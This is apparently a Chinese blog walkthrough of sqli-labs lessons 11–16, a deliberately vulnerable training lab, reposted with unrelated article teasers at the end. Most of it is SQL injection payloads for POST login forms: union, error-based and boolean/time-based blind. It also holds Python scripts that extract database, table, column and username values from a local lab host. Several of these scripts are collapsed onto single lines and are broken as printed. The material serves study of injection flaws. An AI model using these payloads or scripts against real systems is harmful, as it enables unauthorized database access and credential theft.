sqli-labs(3)

11.

看到登录框直接or 1=1

在hackerabar中我们可以看到这里是post传递的数据,在get中用--+来注释后面的内容 因为get中#是用来指导浏览器动作的,--代表注释+是空格,所以这里用#

之后就和get的一样了

1' order by 2 #

order by 3报错

联合注入

1' union select 1,2 #

1‘ union select database(),2#

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

1' union select 1,group_concat(username) from security.users #

12.

1'没反应尝试”

通过“尝试得到报错知道还要)

1") or 1=1 #

之后一样’

1") union select 1,2 #

1") union select 1,database() #

1") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

1") union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#

1") union select 1,group_concat(username) from security.users #

13.

1‘尝试出现报错,知道是1’)

显示登录成功但不会出现提示但是有报错信息使用报错注入,这里使用报错注入我们使用两种报错注入方法

1') and extractvalue(1,concat(0x5c,database()))#

1') and updatexml(1,concat(0x7e,database(),0x7e),1) #

注入得到表名

 1')  and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#1') and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))) #

注入的列名

1') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)
1') and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))#

注入的数据

1') and updatexml(1,concat(0x7e,(select group_concat(username) from security.users ),0x7e),1)
1') and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users)))#

14.

对输入框测试发现当输入1“ or 1=1 #登录成功

使用报错注入

1" and updatexml(1,concat(0x7e,database(),0x7e),1)#
1" and extractvalue(1,concat(0x5c,database()))#

得到数据库库名

1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
1" and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security')))#

得到表名

1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#
1" and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')))#

得到列名

1" and updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1)#
1" and extractvalue(1,concat(0x5c,(select group_concat(username) from security.users)))#

15.

当1’ or 1=1#返回登录成功

这里看到如果输入的为错则返回登录失败不会出现报错信息使用布尔盲注

这里我们要知道and 和or的区别 and'两边的条件都为真才会执行 or一边为真就会执行,而这里我们如果没有爆破过用户admin也不在username中那我们就只能使用or,这里的登录框根据经验第一个肯定是获取username的

admin' and (substr(database(),1,1)='s')#
1' or (substr(database(),1,1)='s')#

1' or (substr(database(),1,1)='a')#

这里成功和失败只会返回不同的照片对于脚本来说没有很明显的特征我们使用sleep来写脚本

import requests,time
def database():data_base = ''charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"while True:for char in charset:payload = {"uname":f"1' or if(substr(database(),{len(data_base) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}url = "http://192.168.1.200:86/Less-15/"start_time = time.time()rsp = requests.post(url,data=payload)end_stime = time.time()rsp_time = end_stime - start_time#print(f"耗时:{rsp_time}")if rsp_time > 2:data_base += charprint(f"数据库名为:{data_base}")breakelse:breakreturn data_basedatas = database()
print(f"最终数据库名为:{datas}")
1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)#

   

def tablename():table_name = ''charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"while True:for char in charset:payload = {"uname":f"1' or if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),{len(table_name) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}url = "http://192.168.1.200:86/Less-15/"start_time = time.time()rsp = requests.post(url,data=payload)end_stime = time.time()rsp_time = end_stime - start_timeif rsp_time > 2:table_name += charprint(f"表名为:{table_name}")breakelse:breakreturn table_nametables = tablename()
print(f"最终表名为:{tables}")

1' or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)#

def  columnname():column_name = ''charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"while True:for char in charset:payload = {"uname":f"1' or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),{len(column_name) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}url = "http://192.168.1.200:86/Less-15/"start_time = time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time > 2:column_name += charprint(f"列名为:{column_name}")breakelse:breakreturn column_namecolumns = columnname()
print(f"最终列名为:{columns}")
1' or if(substr((select username from security.users limit 0,1),1,1)='d',sleep(5),0)#

def data():data = ''charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"while True:for char in charset:payload = {"uname":f"1' or if(substr((select username from security.users limit 0,1),{len(data) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}url = "http://192.168.1.200:86/Less-15/"start_time = time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time > 2:data += charprint(f"数据为:{data}")breakelse:breakreturn datadatadata = data()
print(f"最终数据为:{datadata}")
import requests,time
def database():data_base = ''charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"while True:for char in charset:payload = {"uname":f"1' or if(substr(database(),{len(data_base) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}url = "http://192.168.1.200:86/Less-15/"start_time = time.time()rsp = requests.post(url,data=payload)end_stime = time.time()rsp_time = end_stime - start_time#print(f"耗时:{rsp_time}")if rsp_time > 2:data_base += charprint(f"数据库名为:{data_base}")breakelse:breakreturn data_basedatas = database()
print(f"最终数据库名为:{datas}")def tablename():table_name = ''charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"while True:for char in charset:payload = {"uname":f"1' or if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),{len(table_name) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}url = "http://192.168.1.200:86/Less-15/"start_time = time.time()rsp = requests.post(url,data=payload)end_stime = time.time()rsp_time = end_stime - start_timeif rsp_time > 2:table_name += charprint(f"表名为:{table_name}")breakelse:breakreturn table_nametables = tablename()
print(f"最终表名为:{tables}")def  columnname():column_name = ''charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"while True:for char in charset:payload = {"uname":f"1' or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),{len(column_name) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}url = "http://192.168.1.200:86/Less-15/"start_time = time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time > 2:column_name += charprint(f"列名为:{column_name}")breakelse:breakreturn column_name
columns = columnname()
print(f"最终列名为:{columns}")def data():data = ''charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"while True:for char in charset:payload = {"uname":f"1' or if(substr((select username from security.users limit 0,1),{len(data) +1},1)='{char}',sleep(2),0)#","passwd":"123456"}url = "http://192.168.1.200:86/Less-15/"start_time = time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time > 2:data += charprint(f"数据为:{data}")breakelse:breakreturn datadatadata = data()
print(f"最终数据为:{datadata}")

16.

测试发现1" or 1=1 #时登录成功

1") or if(substr(database(),1,1)='s',sleep(5),0 )#

import requests,timedef dataname():data_name = ""chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"while True:for char in chart:payload = {"uname":f'1") or if(substr(database(),{len(data_name) +1},1)="{char}",sleep(2),0)#',"passwd":"123456"}url = "http://192.168.1.200:86/Less-16/"start_time =time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time >2:data_name += charprint(f"数据库为:{data_name}")breakelse:breakreturn data_namedatas = dataname()
print(f"最终数据名为:{datas}")

1") or if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)#

def tablename():table_name = ""chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"while True:for char in chart:payload = {"uname":f'1") or if(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),{len(table_name) +1},1)="{char}",sleep(2),0)#',"passwd":"123456"}url = "http://192.168.1.200:86/Less-16/"start_time =time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time >2:table_name += charprint(f"表名为:{table_name}")breakelse:breakreturn table_nametables = tablename()
print(f"最终表名为:{tables}")

1") or if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)#

def columnname():column_name = ""chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"while True:for char in chart:payload = {"uname":f'1") or if(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),{len(column_name) +1},1)="{char}",sleep(2),0)#',"passwd":"123456"}url = "http://192.168.1.200:86/Less-16/"start_time =time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time >2:column_name += charprint(f"字段名为:{column_name}")breakelse:breakreturn column_name    columns =   columnname()
print(f"最终字段名为:{columns}")

1") or if(substr((select username from security.users limit 0,1),1,1)='d',sleep(5),0)#

def data():data = ""chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"while True:for char in chart:payload = {"uname":f'1") or if(substr((select username from security.users limit 0,1),{len(data) +1},1)="{char}",sleep(2),0)#',"passwd":"123456"}url =   "http://192.168.1.200:86/Less-16/"start_time =time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time >2:data += charprint(f"数据为:{data}")breakelse:breakreturn datadatas = data()    
print(f"最终数据为:{datas}")

最终脚本

import requests,timedef dataname():data_name = ""chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"while True:for char in chart:payload = {"uname":f'1") or if(substr(database(),{len(data_name) +1},1)="{char}",sleep(2),0)#',"passwd":"123456"}url = "http://192.168.1.200:86/Less-16/"start_time =time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time >2:data_name += charprint(f"数据库为:{data_name}")breakelse:breakreturn data_namedatas = dataname()
print(f"最终数据名为:{datas}")def tablename():table_name = ""chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"while True:for char in chart:payload = {"uname":f'1") or if(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),{len(table_name) +1},1)="{char}",sleep(2),0)#',"passwd":"123456"}url = "http://192.168.1.200:86/Less-16/"start_time =time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time >2:table_name += charprint(f"表名为:{table_name}")breakelse:breakreturn table_nametables = tablename()
print(f"最终表名为:{tables}")def columnname():column_name = ""chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"while True:for char in chart:payload = {"uname":f'1") or if(substr((select column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1),{len(column_name) +1},1)="{char}",sleep(2),0)#',"passwd":"123456"}url = "http://192.168.1.200:86/Less-16/"start_time =time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time >2:column_name += charprint(f"字段名为:{column_name}")breakelse:breakreturn column_name    columns =   columnname()
print(f"最终字段名为:{columns}")def data():data = ""chart = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890"while True:for char in chart:payload = {"uname":f'1") or if(substr((select username from security.users limit 0,1),{len(data) +1},1)="{char}",sleep(2),0)#',"passwd":"123456"}url =   "http://192.168.1.200:86/Less-16/"start_time =time.time()rsp = requests.post(url,data=payload)end_time = time.time()rsp_time = end_time - start_timeif rsp_time >2:data += charprint(f"数据为:{data}")breakelse:breakreturn datadatas = data()    
print(f"最终数据为:{datas}")

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/158204.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

21款奔驰GLS450升级23P驾驶辅助 提升安全出行

辅助驾驶越来越多的被大家所青睐!为了提升驾驶安全性和舒适便捷性奔驰改装原厂半自动驾驶23P辅助系统 23P智能辅助驾驶系统还是很有必要的,因为在跑高速的时候可以使用23P智能驾驶的自动保持车速,保持车距,车道自动居中行驶以及自…

CRM商机管理软件:构建客户为中心的管理理念

企业为什么选择CRM商机管理软件?1.CRM软件能够帮助企业建立以客户为中心的管理理念;2.CRM商机管理软件全面直观的展示客户数据;3.市场人员可以制订个性化的营销策略;4.移动应用为外出的销售带来的便利。 1.构建客户为中心的管理理…

C++实现KNN和K-Means

学校机器学习课程的实验课要求实现KNN和K-Means: (平时没听课)临时去查了一下KNN和K-Means是啥,然后自己用C写了小例子,想着写都写了那就把代码贴出来吧。 顺便再聊聊自己对于这俩算法的理解。 下面是文心一言的回答…

十年诉讼,迈瑞真的赢了吗?

迁延十年,迈瑞与科曼的知识产权纠纷案究竟要如何解读? 发端于2013年,两家国内医疗器械行业知名公司间的专利互诉官司,成为全行业最具代表性的案例。但这一案例本质并不复杂:不过商业利益之争。 要在烈度不断抬升的市…

项目管理PMP6.0-五大过程组、十大知识领域、四十九个过程(记忆码:7664363734)

项目管理PMP6.0-五大过程组、十大知识领域、四十九个过程(记忆码:7664363734) 项目经理的影响力范围三者关系图(五大过程组、十大知识领域、四十九个过程)五大过程组十大知识领域十大知识领域之间联系 四十九个过程&am…

如何通过提升客户体验带来更大的增长、更好的客户留存率?

客户期望的转变 在一个日益数字化的世界里,有必要采取以客户为中心的思维方式。因为客户与企业互动的方式有很多是在数字空间发生的,客户的需求和模式已经转变。 这种情况已经酝酿了几年,但在2020年才打开闸门。随着疫情的爆发,企…

FTX的前世今生:崛起、辉煌与崩塌

FTX,一度被誉为加密货币领域的明星交易所,其快速的崛起和令人瞩目的崩塌吸引了全球的关注。让我们回顾一下FTX的前世今生,了解其短暂的辉煌和骤然的崩塌。 1. 崛起: FTX的创始人山姆班克曼-弗里德在加密货币领域具有深厚的背景和…

Linux主机间的相互免秘钥

主机间的相互免秘钥 1.生成密钥 ssh-keygen -t rsa -P -f ~/.ssh/id_rsa运行以上命令后会在 ~/.ssh/ 目录下生成一对密钥对。 2.拷贝公钥 把自己的公钥传递给对方主机即可,这个公钥文件必须放在对方主机的~/.ssh/authorized_keys 文件中。 ssh-copy-id -i ~/.s…

智能座舱架构与芯片 - (2) 架构篇

一、定义 1.1 智能座舱定义 按照百度百科的定义,智能座舱(intelligent cabin)旨在集成多种IT和人工智能技术,打造全新的车内一体化数字平台,为驾驶员提供智能体验,促进行车安全。目前国内外已经有很多研究…

Django ORM 执行复杂查询的技术与实践

概要 Django ORM(Object-Relational Mapping)是 Django 框架的核心组件之一,提供了一种高效、直观的方式来处理数据库操作。尽管简单查询在 Django ORM 中相对容易实现,但在面对复杂的数据请求时,需要更深入的了解和技…

【文末送书】深入浅出嵌入式虚拟机原理

欢迎关注博主 Mindtechnist 或加入【智能科技社区】一起学习和分享Linux、C、C、Python、Matlab,机器人运动控制、多机器人协作,智能优化算法,滤波估计、多传感器信息融合,机器学习,人工智能等相关领域的知识和技术。关…

「Verilog学习笔记」含有无关项的序列检测

专栏前言 本专栏的内容主要是记录本人学习Verilog过程中的一些知识点,刷题网站用的是牛客网 timescale 1ns/1ns module sequence_detect(input clk,input rst_n,input a,output reg match);reg [8:0] a_tem ; always (posedge clk or negedge rst_n) begin if (~rs…

maven打包项目,然后给其他项目引用

A项目(这个项目需要被打包,作为被引入的项目),不需要启动类,因为作为公共模块被B项目引入: package com.yunya.mvndependontest.rest;import org.springframework.web.bind.annotation.RequestMapping; im…

SpringDoc枚举字段处理与SpringBoot接收枚举参数处理

本期内容 添加SpringDoc配置展示枚举字段,在文档页面中显示枚举值和对应的描述添加SpringMVC配置使项目可以接收枚举值,根据枚举值找到对应的枚举 默认内容 先不做任何处理看一下直接使用枚举当做入参是什么效果。 定义一个枚举 package com.exampl…

0基础学习VR全景平台篇第122篇:VR视频剪辑和输出 - PR软件教程

上课!全体起立~ 大家好,欢迎观看蛙色官方系列全景摄影课程! 开始之前如果没有接触过pr这款软件的话,建议先去看上一篇 认识视频剪辑软件Premiere 大致了解一下pr。 回到正题今天来教大家VR视频的剪辑和输出 我们先双击打开…

喜讯 | 聚铭下一代智慧安全运营中心入选2023年江苏省大数据产业发展试点示范项目

近日,江苏省工信厅公示2023年江苏省大数据产业发展试点示范项目名单。聚铭下一代智慧安全运营中心凭借扎实的技术实力和突出的产品优势成功入选。 为推动新兴数字产业集群建设,夯实大数据产业发展基础,提升产业供给能力和行业赋能效应&…

AD9361寄存器功能笔记之本振频率设定

LO的产生过程如图: 各个模块都有高灵活性。 1、参考时钟即是AD9361全局参考时钟,可以是外接晶振的片上DCXO,或是外部输入的有驱动能力的时钟信号。根据FM-COMMS5的设计,参考时钟可以使用时钟Buffer 40MHz晶振构成的参考频率源。 …

人工智能基础部分21-神经网络中优化器算法的详细介绍,配套详细公式

大家好,我是微学AI,今天给大家介绍一下人工智能基础部分21-神经网络中优化器算法的详细介绍,配套详细公式。本文将介绍几种算法优化器,并展示如何使用PyTorch中的算法优化器,我们将使用MNIST数据集和一个简单的多层感知…

Vue 2使用element ui 表格不显示

直接修改package.json文件 把这两个依赖修改成对应的 删除node_modules 重新安装依赖 重启

VMware Workstation系列:Win11运行VMware延迟卡顿(侧通道缓解相关)

一. Win11运行VMware延迟卡顿 最近在使用VMware时,开机提示如下: 您在运行该虚拟机时启用了侧通道缓解。侧通道缓解可增强安全性,但也会降低性能。 要禁用缓解,请在虚拟机设置的“高级”面板中更改侧通道缓解设置。有关更多详细信…